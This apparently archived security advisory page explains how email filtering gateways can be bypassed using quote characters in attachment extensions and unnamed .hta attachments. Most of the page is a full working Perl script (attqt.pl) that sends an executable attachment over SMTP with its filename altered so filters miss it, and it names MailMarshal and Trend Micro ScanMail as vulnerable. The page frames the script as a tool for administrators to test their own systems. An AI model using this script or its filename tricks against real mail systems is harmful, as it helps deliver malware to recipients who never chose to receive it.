Bypassing Content Filtering Software (Exploit)


Summary
As we reported in our previous article: Bypassing Content Filtering Software, flaws in several e-mail filtering products allow encoded emails that contain malicious attachments to bypass the filtering engines. The following is an exploit code that can be used by administrators to test their system for the mentioned vulnerabilities.


Details
There are many ways you can get past mail filtering systems, because most of them will not emulate the exact behavior of the e-mail clients, especially if you have multiple clients. One of the most effective methods against Outlook/Outlook express is to just name the file

eviltrojan."e"x"e

Outlook/OE will just take the quotes out of the filename before it's executed.

Of course, most filtering systems will scan the file and recognize it as an executable(PE) and disallow it (same goes for VBS/JS files etc, they usually look for very common VB or JS code) but it is pretty obvious that they do not recognize all executable content (Like .bat files?) (Alternatively, encoded data as mentioned in the advisory).

One other thing, Outlook/OE will sometimes give an attachment that has no name a name, depending on the content-type, mostly all non-dangerous types. I.e. if you have a wav attachment, but it has no filename (in the MIME headers) but it has a content-type: audio/x-wav it will name it ATT00xxx.wav. This will work with .hta files if you don't name them and give them content-type=application/hta

Exploit:
#!/usr/bin/perl

# attqt.pl 0.1 by Aidan O'Kelly July 2001
#Send banned attachments through SMTP gateways, this works because MS Outlook removes illegal
#charachters in filenames. So when you put an illegal char (such as ") in the extension. The Gateway will
#not recognize it as a dangerous attachment. But when the user on the other end opens it the illegal
#char will be removed.
#
# Feedback welcome. aidan.ok@oceanfree.net
#
# This is known to work on MailMarshall and TrendMicro Scanmail. Others have not been tested but most are
# probably vunreable. If it works on any others, please mail me and let me know.
# This only puts in one quote after the dot (eg virus."vbs or virus."exe)
# Some gateways might still pick up on the vbs. you can put in more or different
# charachters like virus.%v"b********s if you feel like it.
# $filename =~ s/\./\.\"/g; is the line that changes it.

use Getopt::Std;
use MIME::Base64 qw(encode_base64);
use IO::Socket::INET;


getopt('atfhsb');

if (!$opt_a || !$opt_f || !$opt_t || !$opt_h)
{
print "Usage: attqt.pl <-a attachment> <-t to> <-f from> <-h smtphost> [-s subject] [-b text]\n";
exit;
}

open(FILE, $opt_a) or die "$!";
binmode FILE;
while (read(FILE, $buf, 60*57)) {
$attachment = $attachment . encode_base64($buf);
}
close(FILE);
$filename = $opt_a;
$filename =~ s/\./\.\"/g;
print "$filename\n";
$sock = IO::Socket::INET->new(PeerAddr => "$opt_h",PeerPort => '25', Proto => 'tcp');
unless (<$sock> =~ "220") { die "Not a SMTP Server?" }
print $sock "HELO you\r\n";
unless (<$sock> =~ "250") { die "HELO failed" }
print $sock "MAIL FROM:<>\r\n";
unless (<$sock> =~ "250") { die "MAIL FROM failed" }
print $sock "RCPT TO:<$opt_t>\r\n";
unless (<$sock> =~ "250") { die "RCPT TO failed" }
print $sock "DATA\r\n";
unless (<$sock> =~ "354") { die "DATA failed" }


print $sock "From: $opt_f\n";
print $sock "To: $opt_t\n";
print $sock "Subject: $opt_s\n";

print $sock "MIME-Version: 1.0
Content-Type: multipart/related;
type=\"multipart/alternative\";
boundary=\"NextPart19\"

This is a multi-part message in MIME format.

--NextPart19
Content-Type: multipart/alternative;
boundary=\"NextPart20\"

--NextPart20
Content-Type: text/plain
Content-Transfer-Encoding: quoted-printable

--NextPart20
Content-Type: text/html;
charset=\"iso-8859-1\"
Content-Transfer-Encoding: quoted-printable

";
print $sock "$opt_b\n";
print $sock "--NextPart20--

--NextPart19
Content-Type: application/x-msdownload
Content-Disposition: attachment;filename=\"$filename\"
Content-Transfer-Encoding: base64\r\n\n";
print $sock $attachment;

print $sock "\r\n--NextPart19--\n.\n";
print "Finished sending data\n";
$a = <$sock>;
print "$a\n";
close($sock);

sourse: http://www.securiteam.com/exploits/5ZP0D2K6AY.html